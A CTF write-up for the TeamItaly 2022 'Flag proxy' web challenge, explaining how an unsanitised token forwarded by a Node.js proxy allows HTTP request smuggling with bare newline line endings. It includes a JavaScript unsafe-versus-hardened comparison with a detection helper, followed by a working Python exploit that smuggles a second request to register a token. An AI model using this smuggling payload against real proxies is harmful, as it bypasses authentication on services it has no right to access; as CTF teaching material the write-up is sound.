Tags: web 

TeamItaly CTF 2022

Flag proxy (41 solves)

I just added authentication to my flag service (server-back) thanks to a proxy (server-front), but a friend said it's useless...

Solution

The proxy's HTTP client can be exploited to make more than one request to the downstream server on a single connection.
The injected requests are not valid HTTP, because some header lines use only \n as the line terminator, but the downstream server accepts them anyway (this no longer happens since Node.js 18.5.0).
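The mistake behind this, shown as an added example that is not the challenge's server-front code: a user-controlled token spliced raw into an outgoing request, next to a hardened version that rejects control characters and percent-encodes the value. How the real proxy builds its upstream request is assumed here; the smuggled token is the writeup's payload, constructed inline.

```javascript
// Added example, not the challenge's server-front code. The way the real
// proxy assembles its upstream request is an assumption; the point is the
// class of bug: a user-controlled value spliced into an HTTP request.

// The writeup's payload, constructed inline for the demonstration.
const SMUGGLED_TOKEN =
  "AAAA\nContent-Length: 0\nConnection: keep-alive\n\n" +
  "GET /add-token?token=INJECTED HTTP/1.0\nHost: localhost";

// Unsafe: raw interpolation. With bare "\n" terminators a lenient parser
// (Node.js before 18.5.0, per the writeup) reads two requests here.
function buildUpstreamRequestUnsafe(token) {
  return `GET /flag?token=${token} HTTP/1.1\nHost: server-back\n\n`;
}

// Hardened, step 1: refuse CR, LF or any other control byte before the
// value gets anywhere near a request line or header.
function assertNoControlChars(value, name = "value") {
  if (typeof value !== "string") throw new TypeError(`${name} must be a string`);
  if (/[\x00-\x1f\x7f]/.test(value)) {
    throw new Error(`${name} contains control characters`);
  }
  return value;
}

// Hardened, step 2: percent-encode, so even a value that slipped past the
// check could only ever be read as a single query parameter.
function buildUpstreamRequestSafe(token) {
  const clean = assertNoControlChars(token, "token");
  return `GET /flag?token=${encodeURIComponent(clean)} HTTP/1.1\r\nHost: server-back\r\n\r\n`;
}

// Detection helper: count request lines in a raw upstream request when
// line endings are treated leniently (\n or \r\n). A proxy forwarding one
// client request should produce exactly one.
function countRequestLines(raw) {
  const lines = raw.split(/\r?\n/);
  return lines.filter((l) => /^[A-Z]+ \S+( HTTP\/1\.[01])?$/.test(l)).length;
}

// countRequestLines(buildUpstreamRequestUnsafe(SMUGGLED_TOKEN)) → 2
// countRequestLines(buildUpstreamRequestSafe("deadbeef"))       → 1
```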

Exploit

import os
import random
import string

import requests

URL = os.environ.get("URL", "http://flag-proxy.challs.teamitaly.eu")

# Random token that the smuggled request will register on server-back.
token = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(20))

# Header lines end with a bare \n; the blank line closes the first request and
# a second request (registering the token) follows on the same connection.
payload = 'AAAA\n'
payload += 'Content-Length: 0\n'
payload += 'Connection: keep-alive\n'
payload += '\n'
payload += f'GET /add-token?token={token} HTTP/1.0\n'
payload += 'Host: localhost'

# The proxy forwards the token as-is, so server-back sees both requests.
response = requests.get(f"{URL}/flag", params={'token': payload})

print(response.text)

# The token is now known to server-back, so the flag can be fetched through the proxy.
response = requests.get(f"{URL}/flag", params={'token': token})

print(response.text)
Original writeup (https://github.com/TeamItaly/TeamItalyCTF-2022/blob/master/FlagProxy/README.md).